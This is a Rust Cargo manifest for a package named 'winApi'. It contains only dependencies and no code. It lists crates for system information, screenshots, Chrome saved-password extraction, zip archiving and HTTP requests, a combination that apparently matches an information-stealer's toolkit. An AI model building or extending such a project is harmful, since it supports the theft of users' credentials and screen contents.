
[package]
name = "winApi"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]

sysinfo = "0.29.4"
screenshots = "0.6.0"
zip = "0.5.12"
human_bytes = "0.4.3"
reqwest = { version = "0.10.0-alpha.2", features = ["blocking"] }
serde_json = "*"
chrome_password = "0.2"